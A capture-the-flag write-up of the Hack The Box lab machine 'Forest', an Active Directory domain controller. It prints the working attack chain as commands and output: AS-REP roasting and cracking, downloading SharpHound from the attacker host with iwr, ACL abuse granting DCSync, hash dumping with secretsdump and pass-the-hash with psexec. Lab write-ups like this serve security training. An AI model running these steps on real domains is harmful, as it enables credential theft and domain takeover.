Forest is an easy windows box released back in October 2019.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.0.0.10/16 ] [ /dev/pts/27 ] [Documents/Github/void.yt]
→ nmap -sCV 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 17:55 CEST
Nmap scan report for 10.10.10.161
Host is up (0.34s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-24 16:10:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h34m28s, deviation: 4h02m30s, median: 14m28s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-05-24T09:10:39-07:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-24T16:10:42
|_ start_date: 2021-05-24T16:09:41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
Our nmap scan picked up the RPC service, so let's run enum4linux:
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ enum4linux 10.10.10.161
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 24 18:06:21 2021
[...]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
[...]
Now we got a list of users through the RPC client because the NULL sessions are allowed. The svc-alfresco is most likely a service account, so let's bruteforce his hash using GetNPUsers.py:
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ locate GetNPUsers.py
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ cp $(locate GetNPUsers.py) .
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ python3 GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed2741d3b13fa9e7d5139ad362374207de52ceea2d1c4c6c851ec3f5418e9770fbd7ee9e4a98be09e5fdbdd3c2adc308df47be4e45ed86d7dac2af93fffeba10958f5f9993074ced0856a5b7bda28b5429eef42f401335dbed30bb66cebaaf95805b04967da19640d5887b84cd7208878b802c2914bdba0705d944b5065fb05207a00ff3b1239fdc47686b7c4feee1ab5cf3b11c85d4426b099ff17af0b7b75e0cde27686a2dd0c406a9022ebc59da30b9e4413aecb46f8cdd835d5950a588b56ba671964d2f3aac364c403fc97bd8f38ff7c8ab49053cef
And we got svc-alfresco's TGT which is a hash that contains the encrypted password. This is because the 'Do not require Kerberos preauthentication' is set, and svc-alfresco is not configured with pre-authentication. Next step is to bruteforce the hash itself:
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ vim hash.txt
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ cat hash.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed2741d3b13fa9e7d5139ad362374207de52ceea2d1c4c6c851ec3f5418e9770fbd7ee9e4a98be09e5fdbdd3c2adc308df47be4e45ed86d7dac2af93fffeba10958f5f9993074ced0856a5b7bda28b5429eef42f401335dbed30bb66cebaaf95805b04967da19640d5887b84cd7208878b802c2914bdba0705d944b5065fb05207a00ff3b1239fdc47686b7c4feee1ab5cf3b11c85d4426b099ff17af0b7b75e0cde27686a2dd0c406a9022ebc59da30b9e4413aecb46f8cdd835d5950a588b56ba671964d2f3aac364c403fc97bd8f38ff7c8ab49053cef
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ john -w=/usr/share/wordlists/rockyou.txt hash.txt
[...]
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
[...]
And now that we have alfresco's password, let's use evil-winrm to login:
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ sudo gem install evil-winrm
Fetching nori-2.6.0.gem
Fetching rubyntlm-0.6.3.gem
Fetching multi_json-1.15.0.gem
Fetching little-plugger-1.1.4.gem
Fetching gyoku-1.3.1.gem
Fetching logging-2.3.0.gem
Fetching httpclient-2.8.3.gem
Fetching builder-3.2.4.gem
Fetching gssapi-1.3.1.gem
Fetching evil-winrm-2.4.gem
Fetching winrm-2.3.6.gem
Fetching winrm-fs-1.3.5.gem
Fetching erubi-1.10.0.gem
Successfully installed rubyntlm-0.6.3
Successfully installed nori-2.6.0
Successfully installed multi_json-1.15.0
Successfully installed little-plugger-1.1.4
Successfully installed logging-2.3.0
Successfully installed httpclient-2.8.3
Successfully installed builder-3.2.4
Successfully installed gyoku-1.3.1
Successfully installed gssapi-1.3.1
Successfully installed erubi-1.10.0
Successfully installed winrm-2.3.6
Successfully installed winrm-fs-1.3.5
Happy hacking! :)
Successfully installed evil-winrm-2.4
[...]
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> sysinfo
The term 'sysinfo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ sysinfo
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (sysinfo:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> systeminfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo
+ ~~~~~~~~~~.
At line:1 char:1
+ systeminfo
+ ~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get to the user flag.
Now let's check the users on this machine:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net users
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
Now here we need to do some AD recon, and we're going to use BloodHound
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ sudo apt install bloodhound -y
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ bloodhound
Here we see that we need to connect to the neo4j database, so let's start it up with sudo privileges:
[ 10.10.14.13/23 ] [ /dev/pts/28 ] [~/HTB/Forest]
→ sudo neo4j console
[sudo] password for nothing:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
run: /usr/share/neo4j/run
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2021-05-24 16:45:38.529+0000 INFO Starting...
2021-05-24 16:45:40.163+0000 INFO ======== Neo4j 4.2.1 ========
2021-05-24 16:45:41.980+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2021-05-24 16:45:41.985+0000 INFO Setting up initial user from defaults: neo4j
2021-05-24 16:45:41.986+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2021-05-24 16:45:42.003+0000 INFO Setting version for 'security-users' to 2
2021-05-24 16:45:42.009+0000 INFO After initialization of system graph model component 'security-users' have version 2 and status CURRENT
2021-05-24 16:45:42.015+0000 INFO Performing postInitialization step for component 'security-users' with version 2 and status CURRENT
2021-05-24 16:45:42.697+0000 INFO Bolt enabled on localhost:7687.
2021-05-24 16:45:43.379+0000 INFO Remote interface available at http://localhost:7474/
2021-05-24 16:45:43.380+0000 INFO Started.
Now let's log into it with the default credentials neo4j:neo4j:
More precisely, we're going to use the Bloodhound Ingestor to collect the Active Directory Data:
Once you've set the new password, simply login:
Once you've logged in to bloodhound, we're going to use SharpHound.ps1 in order to find the AD Administrators, to do so we're going to make use of our Evil-WinRM session:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
→ sudo updatedb
[sudo] password for nothing:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
→ locate SharpHound.ps1
/usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
/usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
→ cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ ls -lash SharpHound.ps1
952K -rw-r--r-- 1 nothing nothing 952K May 24 18:57 SharpHound.ps1
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Now here we need to upload SharpHound.ps1:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
→ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> iwr -uri "http://10.10.14.13/SharpHound.ps1" -outfile "sharp.ps1"
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/24/2021 10:24 AM 974235 sharp.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./sharp.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -CollectionMethod All
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/24/2021 10:41 AM 15196 20210524104146_BloodHound.zip
-a---- 5/24/2021 10:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 5/24/2021 10:24 AM 974235 sharp.ps1
Once we run sharp.ps1 we get a zip file, so let's copy it back to our kali machine, to do so we can use evil-winrm's built-in download function:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20210524104146_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20210524104146_BloodHound.zip to 20210524104146_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> exit
Info: Exiting with code 0
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ ls -lashg 20210524104146_BloodHound.zip
16K -rw-r--r-- 1 nothing 15K May 24 19:39 20210524104146_BloodHound.zip
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ ls -lash 20210524104146_BloodHound.zip
16K -rw-r--r-- 1 nothing nothing 15K May 24 19:39 20210524104146_BloodHound.zip
Now that we got the zip file locally, let's load it in bloodhound:
So here we finally see what's going on, and we can find the shortest path to domain admin:
svc-alfresco has GenericAll rights on the Exchange Windows Permissions group, so we can add this user to the group, next the WriteDacl rights allows us to give DCsync rights to our compromised user, and retrieve the NTLM hashes for all users on the domain. To exploit the ACL path automatically we can use aclpwn:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ pip install aclpwn
Collecting aclpwn
Downloading aclpwn-1.0.0-py3-none-any.whl (17 kB)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from aclpwn) (2.25.1)
Requirement already satisfied: ldap3>=2.5 in /usr/lib/python3/dist-packages (from aclpwn) (2.8.1)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from aclpwn) (0.9.22)
Collecting neo4j-driver
Downloading neo4j-driver-4.2.1.tar.gz (69 kB)
|████████████████████████████████| 69 kB 1.6 MB/s
Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from neo4j-driver->aclpwn) (2021.1)
Building wheels for collected packages: neo4j-driver
Building wheel for neo4j-driver (setup.py) ... done
Created wheel for neo4j-driver: filename=neo4j_driver-4.2.1-py3-none-any.whl size=95273 sha256=2b8a5fca03df766fe46cfdcd83ef272170de7f3d1000c49c114ae78bd4efeea1
Stored in directory: /home/nothing/.cache/pip/wheels/fe/a2/12/36d9ab6287417260db156b6021d409f296d274a11f23373cfe
Successfully built neo4j-driver
Installing collected packages: neo4j-driver, aclpwn
WARNING: The script aclpwn is installed in '/home/nothing/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed aclpwn-1.0.0 neo4j-driver-4.2.1
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ PATH=$PATH:/home/nothing/.local/bin
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ aclpwn -f svc-alfresco -ft user -t htb.local -tt domain -d htb.local -dp bloodhound -du neo4j --server 10.10.10.161 -u svc-alfresco -sp s3rvice -p s3rvice
So you can use that, or you can also just do it manually as follows:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" svc-alfresco /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/24/2021 11:15:40 AM
Password expires Never
Password changeable 5/25/2021 11:15:40 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/24/2021 9:27:15 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Exchange Windows Perm*Domain Users
*Service Accounts
The command completed successfully.
So here we added alfresco to the Exchange Windows Permissions @HTB.LOCAL, next step is to grant alfresco DcSync privileges using PowerView
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 's3rvice' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
Obviously we need PowerView.ps1 so let's first copy it to our local directory where we started the Evil-WinRM session:
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
→ locate PowerView.ps1
/usr/lib/python3/dist-packages/cme/data/powersploit/Recon/PowerView.ps1
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Be careful, these are outdated PowerView.ps1 files, you need to get the most recent one:
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
→ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -O PowerView.ps1
--2021-05-24 20:16:08-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’
PowerView.ps1 100%[===================================================================================================================================================>] 752.23K 3.25MB/s in 0.2s
2021-05-24 20:16:08 (3.25 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
Now we upload PowerView to the machine:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/24/2021 10:41 AM 15196 20210524104146_BloodHound.zip
-a---- 5/24/2021 10:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 5/24/2021 11:31 AM 770279 PowerView.ps1
-a---- 5/24/2021 10:24 AM 974235 sharp.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> remove-module PowerView
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> import-module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 's3rvice' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "svc-alfresco" -Rights DCSync
And from there we can use secretsdump.py to get the hashes of all users using DcSync:
secretsdump.py svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[...]
[*] Cleaning up...
And finally we simply use the Admin hash with psexec.py, if you don't have it yet, install it as follows:
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
→ git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 19239, done.
remote: Counting objects: 100% (339/339), done.
remote: Compressing objects: 100% (205/205), done.
remote: Total 19239 (delta 193), reused 232 (delta 133), pack-reused 18900
Receiving objects: 100% (19239/19239), 6.61 MiB | 4.26 MiB/s, done.
Resolving deltas: 100% (14585/14585), done.
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
→ cd impacket
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
→ sudo pip3 install .
[sudo] password for nothing:
Processing /home/nothing/HTB/Forest/impacket
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (1.16.0)
Building wheels for collected packages: impacket
Building wheel for impacket (setup.py) ... done
Created wheel for impacket: filename=impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3-none-any.whl size=1397782 sha256=39758aa69b8434256a2f79b26209d55225fecd0090950c922499e17de963a10f
Stored in directory: /tmp/pip-ephem-wheel-cache-ln48imhy/wheels/7a/85/ca/606ceaff4c6e06dc108bb711bd0c0de17bc79b379a138a14c9
Successfully built impacket
Installing collected packages: impacket
Attempting uninstall: impacket
Found existing installation: impacket 0.9.22
Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.
Successfully installed impacket-0.9.23.dev1+20210519.170900.2f5c2476
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
→ sudo python3 setup.py install
Then use it with the admin hash:
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
→ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 htb.local/Administrator@10.10.10.161
Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file kvZZufbZ.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service HFYI on 10.10.10.161.....
[*] Starting service HFYI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>systeminfo
Host Name: FOREST
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA930
Original Install Date: 9/18/2019, 10:07:59 AM
System Boot Time: 5/24/2021, 9:09:23 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 635 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 990 MB
Virtual Memory: In Use: 1,441 MB
Page File Location(s): C:\pagefile.sys
Domain: htb.local
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB3199986
[02]: KB4512574
[03]: KB4103720
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.161
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\Windows\system32>cd ..
C:\Windows>cd ..
C:\>cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
Here we can see the progress graph :